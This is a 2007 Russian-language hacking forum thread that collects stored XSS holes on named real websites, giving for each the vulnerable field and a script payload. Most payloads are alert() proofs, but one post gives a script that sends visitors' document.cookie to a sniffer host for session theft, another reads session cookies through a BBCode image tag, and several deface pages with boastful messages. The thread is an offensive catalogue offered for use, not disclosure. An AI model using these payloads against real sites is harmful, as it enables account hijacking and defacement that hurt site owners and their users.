Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    Тут постим тока активные XSS.

    Так же сайт на котором вы нашли xss должен быть более или менее популярным:

    1. Он не должен быть расположен на бесплатном хостинге.

    2. Так же тиц и pr сайтов должны быть соотвественно не ниже 100 и 3. Сайтов удовлетворяющих этому требованию хоть отбавляй, а вот постить и искать xss на совсем не известных не интресно и не имеет смысла вообще.

    Желательно (но не обязательно), что бы сайты были на it тематику, или к примеру более менее известные треккеры, порталы.
     
    _________________________
    #1 +toxa+, 18 Mar 2007
    Last edited by a moderator: 13 Jul 2008
    9 people like this.
  2. none222

    none222 Guest

    Reputations:
    0
    Сайт с хак-софтом, там и мой трой лежит))
    samouchka.net - когда коммент добавляешь впиши.
    <img src=http://samouchka.net/engine/data/emoticons/sad.gif onload=XSS]
     
    #2 none222, 19 Mar 2007
    Last edited by a moderator: 19 Mar 2007
    6 people like this.
  3. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    www.jjurnal.ru

    Довольно популярный жж.
    Постим сообщение от анонимного пользователя.
    Уязвимо поле "Имя:"
    "><script>alert()</script>

    Работает в опере и ие.
     
    #3 freddi, 19 Mar 2007
    Last edited: 19 Mar 2007
    4 people like this.
  4. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    email.ru

    может и было..ибо XSS самая тупая))
    ..
    отправляем письмо ..естестн в html....

    Code:
    <script>alert()</script>
    или
    Code:
    <img src=javascript:alert()>
     
  5. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    serials.softkiller.net
    В теме любого кряка пишем камент с хсс
    Code:
    "><script>alert('xss')</script>
     
  6. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    proplay.ru

    proplay.ru

    Идём в раздел "Команды":
    --http://www.proplay.ru/team/
    Там создаём новую команду.
    Уязвимыми являются поля:
    -Игры
    -IRC канал
    -Домашняя страница

    Test:
    --http://www.proplay.ru/team/744/
     
    2 people like this.
  7. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    sysadmin.mail.ru

    Заходи на sysadmin.mail.ru.....
    Сморим *Сервисы Сисадмина* там лезим в *Моя регистрационная анкета*
    в поле Крупный город: Выбираем любой город))
    далее в поле Свой город/район: строчим
    Code:
    "><script>img = new Image(); img.src = "http://сайт.ru/сниффер.gif?"+document.cookie;</script>
    и жмём Сохранить изменения...
    после переходим в Whois ..находим наш город...если в списке ников есть наш ник.....значит куки уже на снифе))ибо ненадо даже давать ссылку на свой профиль...просто на город где ваш логин)) :)
     
    1 person likes this.
  8. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    www.qiq.ru
    После регистрации, в профиле изменяем уязвимые поля, а именно:
    1)Место жительства
    2)О себе
    А этих местах пишем
    Code:
    "><script>alert(/xss/)</script>
    Пример
     
  9. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    ДОМ 3 ХЭК =))))))

    dom3mir.ru

    Регистрируемся с любыми данными......
    Далее идем изменять свою анкету...
    В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете
    Code:
    Москва" onmouseover="alert('xss')"
    Далее идете в поиск...ищите себя понику и вот xss =)
     
  10. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    http://www.ohizba.ru/index.php?type=page&id=13
    уязвимы все поля в гостевой книге
    фуфло, но баг..
    //updat3:
    Code:
    http://www.autolider.info/news/main.php?id=108&cpage=1
    уязвимость в поле "name" в комментах ;)
    извините, редактирование не пашет.. если я что-то нарушил, соедините плз посты :)

    запахало)
     
    #10 n1†R0x, 29 Mar 2007
    Last edited: 31 Mar 2007
    1 person likes this.
  11. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    splashblog.com

    Блоггер фоток. Заливаем новую фотку. Уязвимо поле "Caption:"

    Code:
    "><script>alert();</script>
    Работает в ие и опере.
     
  12. n1†R0x

    n1†R0x Elder - Старейшина

    Joined:
    20 Jan 2007
    Messages:
    728
    Likes Received:
    376
    Reputations:
    235
    http://rock-rus.com.ru/users.php

    в регистрации пишем мыло
    Code:
    [email protected]"><script>alert('alert')</script>
     
  13. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    icq.com

    Заходим на форумы или в группы, создаем голосование. Уязвимы поля "Answer..."
    Code:
    <script>alert(1);</script> 
    Получилось голосование и теперь, когда кто-либо будет голосовать за пункт с алертом - то будут выскакивать все алерты (дапустим вы поставили алерты на все ансверы)))

    Работает в ие и опере.
     
    #13 freddi, 4 Apr 2007
    Last edited: 4 Apr 2007
    2 people like this.
  14. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    meta.ua

    Идем в блог, создаем комментарий
    Code:
    <script>alert(10);</script>
    и при ответе на этот коментарий вылезает алерт.

    Работает в ие и опере.
     
  15. freddi

    freddi Elder - Старейшина

    Joined:
    5 Jul 2006
    Messages:
    399
    Likes Received:
    243
    Reputations:
    145
    comby.ru


    Везде где можно оставить комментарий:
    Code:
    <img src=javascript:alert()>
    вылезет алерт.

    Работает в ие и опере.
     
    #15 freddi, 5 Apr 2007
    Last edited: 5 Apr 2007
  16. none222

    none222 Guest

    Reputations:
    0
    http://planeta.solo.by/- геймерский сайт провайдера.

    В личку написать:

    <img src=fuck onerror=alert(\'xss\')
     
  17. Horsekiller

    Horsekiller Elder - Старейшина

    Joined:
    22 Nov 2006
    Messages:
    61
    Likes Received:
    33
    Reputations:
    6
    tForum <= b0.915
    Форум малораспространённый, но всё же.

    Активная XSS в поле "Message".

    Code:
    http://www.target/path/message.php
    Вставляем в поле "Message":

    Code:
    [img]javascript:alert(document.cookie)[/img]
    В кукисах сессия, логин.
     
    2 people like this.
  18. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Отморозки
    [​IMG]
    =============
    Otmorozki.org
    =============
    Заходим в любую новость пишем комментарий...
    Уязвимое поле "тема" ..вот там и пишем наш кодик..
    Code:
    "><script>alert("Отморозки вас похекале")</script>
    Теперь ваша уязвимость ( xss ) будет гулять везде))Даже на главной странице
     
  19. [loy]

    [loy] Elder - Старейшина

    Joined:
    24 Mar 2006
    Messages:
    126
    Likes Received:
    23
    Reputations:
    16
    жесть,зачод
     
  20. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    Warcraft
    [​IMG]
    =============
    Games.mipt.ru/wc3/
    =============

    Уязвимые поля при регистрации:
    "Полное имя"
    "О пользователе"
    "Дом.страница"

    Вставляем туда код
    Code:
    "><script>alert("Mipt \nВас похекале....\nУязвимость на вашем сайте нашел я, Isis \nРеспект всему античату \nА также отдельный респект:\n gemaglabin\n Great\n blackybr\n ettee\n and etc..... Гыгы \n Короче вас похекале :))) ")</script>
    И вот пример.....просмотр моего профиля
    Isis